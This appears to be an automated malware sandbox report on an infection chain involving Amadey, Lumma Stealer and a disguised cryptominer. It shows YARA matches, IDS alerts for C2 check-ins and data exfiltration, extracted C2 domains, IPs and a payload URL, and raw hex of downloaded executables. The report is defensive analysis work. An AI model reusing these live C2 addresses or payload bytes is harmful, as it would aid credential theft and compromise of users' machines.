                          Source: Yara matchFile source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000025.00000002.3209344034.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.3209344034.000000000120C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.3210399876.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.3209344034.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 5740, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1048, type: MEMORYSTR
                          Found strings related to Crypto-Mining
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                          Source: Intel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49895 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:49913 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49919 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49959 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:49971 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.6:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.6:50000 version: TLS 1.2
                          Source: Binary string: wkernel32.pdb source: 1459165c97.exe, 0000002A.00000003.3316733484.0000000005F50000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316638415.0000000005E30000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdb source: 1459165c97.exe, 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3317173955.0000000006050000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3326988369.00000000055F0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdb source: 1459165c97.exe, 0000002A.00000003.3315847424.0000000006020000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3315660818.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319193726.00000000053D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319970257.00000000055C0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3316144032.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316322619.0000000005FD0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3321405527.0000000005570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3320430105.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3315847424.0000000006020000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3315660818.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319193726.00000000053D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3319970257.00000000055C0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: 1459165c97.exe, 0000002A.00000003.3316144032.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316322619.0000000005FD0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3321405527.0000000005570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3320430105.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3317173955.0000000006050000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3326988369.00000000055F0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernel32.pdbUGP source: 1459165c97.exe, 0000002A.00000003.3316733484.0000000005F50000.00000004.00000001.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000003.3316638415.0000000005E30000.00000004.00000001.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DA36A9 FindFirstFileExW,8_2_00DA36A9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00DA375A
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00DA36A9 FindFirstFileExW,10_2_00DA36A9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00DA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00DA375A
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00416124
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov ecx, eax10_2_0040D2EA
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0BB14481h]10_2_0043A742
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx esi, byte ptr [ebp+edx-00000090h]10_2_0041C84E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov word ptr [ebp+00h], cx10_2_00427870
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h10_2_0041703C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi]10_2_004228D0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx eax, byte ptr [ecx+esi]10_2_00408080
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Bh]10_2_004090A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [eax], cl10_2_004090A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edx, eax10_2_0043C0A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_00433140
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [edx], cl10_2_0041A951
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h]10_2_0043D150
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edx, ecx10_2_004291C3
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [edi], al10_2_004161FA
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h10_2_0043C980
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h10_2_00417984
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edx, eax10_2_0043C1A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edx, eax10_2_0043C1BB
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edx, eax10_2_0043C1B9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh10_2_0040E241
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh10_2_0040E241
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx esi, byte ptr [ebp+edx-00000090h]10_2_0041C84E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h]10_2_0043CAD0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then jmp eax10_2_004172AE
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [edx], cl10_2_00409350
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh10_2_0040E35C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh10_2_0040E35C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh10_2_0040E35C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then jmp dword ptr [00442784h]10_2_0040B35D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx+3DAAA828h]10_2_0040B35D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then test eax, eax10_2_00436BA0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+6DBD87B7h]10_2_00436BA0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00421440
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]10_2_00407450
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]10_2_00407450
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [esi], al10_2_0041AC69
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00421C00
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]10_2_0042CC0E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov ecx, eax10_2_0040D417
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov ecx, eax10_2_00414486
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx+6DBD87A7h]10_2_00414486
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edi, 00000001h10_2_00414486
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov eax, dword ptr [esi+00000084h]10_2_00415D31
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-41h]10_2_00415D31
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then xor ebx, ebx10_2_00415D31
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_004295E0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00413DE2
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h10_2_00413DE2
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h]10_2_0043CDF0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov ecx, eax10_2_004235A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh10_2_004235A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edi, dword ptr [esp+2Ch]10_2_004235A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then lea edx, dword ptr [eax-30h]10_2_0042B641
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edx, dword ptr [esi+1Ch]10_2_0042B641
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E5FE86B7h10_2_00421E5D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then jmp edx10_2_00421E5D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]10_2_0042C661
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-41h]10_2_00415E22
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_0042BED5
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]10_2_0042C69E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then jmp eax10_2_0042669F
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]10_2_0042C6B0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]10_2_00438EB0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [edi], al10_2_0042AF44
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov dword ptr [esi+04h], eax10_2_0042C748
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then jmp eax10_2_00426751
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov edx, ecx10_2_00428F6F
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]10_2_00402F00
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov esi, dword ptr [esp+38h]10_2_00427F39
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0BB14481h]10_2_0043A7E9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [edi], al10_2_0042AFFD
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then jmp eax10_2_00418782
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 4x nop then mov byte ptr [edi], al10_2_0042AFB4

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49862 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49871
                          Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:52014 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:54533 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49888 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49895 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49907 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49919 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49940 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49959 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:49980 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49961
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49985 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49971 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49895 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49895 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49959 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49919 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49919 -> 172.67.179.109:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49913 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49913 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49929 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49929 -> 104.21.23.76:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: necklacebudi.lat
                          Source: Malware configuration extractorURLs: rapeflowwj.lat
                          Source: Malware configuration extractorURLs: sustainskelet.lat
                          Source: Malware configuration extractorURLs: energyaffai.lat
                          Source: Malware configuration extractorURLs: crosshuaht.lat
                          Source: Malware configuration extractorURLs: discokeyus.lat
                          Source: Malware configuration extractorURLs: aspecteirs.lat
                          Source: Malware configuration extractorURLs: grannyejh.lat
                          Source: Malware configuration extractorURLs: pancakedipyps.click
                          Source: Malware configuration extractorURLs: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:09:11 GMTContent-Type: application/octet-streamContent-Length: 765568Last-Modified: Tue, 17 Dec 2024 09:46:16 GMTConnection: keep-aliveETag: "67614868-bae80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 86 04 00 00 d0 02 00 00 86 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 86 04 00 00 60 07 00 00 86 04 00 00 fa 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 10:09:18 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 